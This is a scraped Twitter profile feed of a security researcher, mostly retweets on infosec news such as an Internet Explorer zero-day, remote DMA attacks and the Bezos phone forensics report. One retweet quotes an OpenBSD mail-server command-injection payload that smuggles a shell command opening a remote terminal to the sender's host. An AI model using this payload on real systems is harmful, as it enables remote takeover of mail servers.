Dekeneas

@dekeneas

phrack author | hunting APT in my spare time

the internet
Vrijeme pridruživanja: listopad 2018.

Tweetovi

Blokirali ste korisnika/cu @dekeneas

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @dekeneas

  1. proslijedio/la je Tweet
    2. velj
    Poništi
  2. proslijedio/la je Tweet
    30. sij

    DMA attacks are often misunderstood as requiring physical access to a device. However, in many cases they can be done remotely, like in this example of exploiting firmware on Nerwork Cards

    Poništi
  3. proslijedio/la je Tweet
    18. sij

    New Internet Explorer 0day and advisory out. Exploited in wild. No patch from Microsoft. Mitigation is to not use IE. CVE-2020-0674

    Poništi
  4. proslijedio/la je Tweet
    30. sij

    OpenBSD sEcUrE bY DeFaUlT exploit: MAIL FROM:<;xterm --display yourip:0;>

    Poništi
  5. proslijedio/la je Tweet
    30. sij

    Perhaps Tech giants should apply the "spouse" test to data collection: "If my spouse told me they want to collect this data on me to be a better partner, would I view this as excessive or creepy?" We tolerate stuff there that we'd never tolerate from our most trusted persons.

    Poništi
  6. proslijedio/la je Tweet
    29. sij

    We will reserve a talk slot for most promising new speaker, age 25 and under, picked by our selection committee, fly them out to talk. For the top four submitters, including the winner, we'll give complentary seats at a Dojo of their choice (lim 1/course, rank choice) 2/4

    Poništi
  7. 29. sij
    Poništi
  8. proslijedio/la je Tweet
    29. sij

    Any advisory that contains the line “to overcome this limitation we drew inspiration from the Morris worm” in 2020 is pure gold. Team Qualys continues their retro onslaught vs OpenBSD.

    Prikaži ovu nit
    Poništi
  9. proslijedio/la je Tweet
    28. sij

    My comments about the hubbub of AV vuln use finally being caught: Everybody with any experience knew it's going on. AV software was vuln-dev training material more than a decade ago. There were just sufficient economic reasons to ignore it until it became indisputable.

    Poništi
  10. proslijedio/la je Tweet
    25. sij

    I miss escaping sandboxes... I've just been grinding out these dumb LPEs because it's hard to really push yourself when depressed.. and they pay good bounties.. I just really want to feel the rush again of escaping a sandbox. Guess msft has a new browser..

    Prikaži ovu nit
    Poništi
  11. 26. sij

    The report by FTI gives an insight on how many script kiddies actually made it in the infosec industry 🤦‍♂️

    Poništi
  12. 26. sij

    When I first read about the "encrypted downloader" I was like "holy shit, how did they put it there before actual exploitation 🤔" but now it's clear 🤦‍♂️

    Poništi
  13. proslijedio/la je Tweet
    23. sij

    Maybe those brillant Saudi students who spoke at last year can teach one trick or two to FTI Consulting and the former FBI/WH experts about WhatsApp Forensics.

    Poništi
  14. proslijedio/la je Tweet
    23. sij

    Microsoft have released an open source tool to analyze source code for vulnerabilities in almost any modern language:

    Poništi
  15. proslijedio/la je Tweet
    25. sij

    Arcana is looking for ELF binary experts; adept in reverse engineering and software engineering in C. Linux kernel internal knowledge a huge plus. Email resumes to engineering,

    Poništi
  16. 23. sij

    That's why I say no disease can wipe out mankind.. Nowadays they're finding cures & vaccines for everything

    Poništi
  17. proslijedio/la je Tweet
    20. ožu 2018.

    It is time.

    Poništi
  18. proslijedio/la je Tweet
    23. sij

    The modern age fortune tellers will use their crystal balls to tell you if your iPhone has been hacked. No seriously the lack of real inspectability of iPhones has created a market for companies that sell reports to clients that convince them they got hacked 😂

    Poništi
  19. proslijedio/la je Tweet
    23. sij

    The Bezos forensic report is not very good. The forensic analysis should be done by who at least have the relevant experience. The MP4 file should contain the exploit (if it is CVE-2019-11931). The exploit trigger should be visible with ffmpeg

    Prikaži ovu nit
    Poništi
  20. 22. sij

    Working on a new product: Dekeneas for filesystems, aimed at identifying APT & cybercriminal activity using artificial intelligence.

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·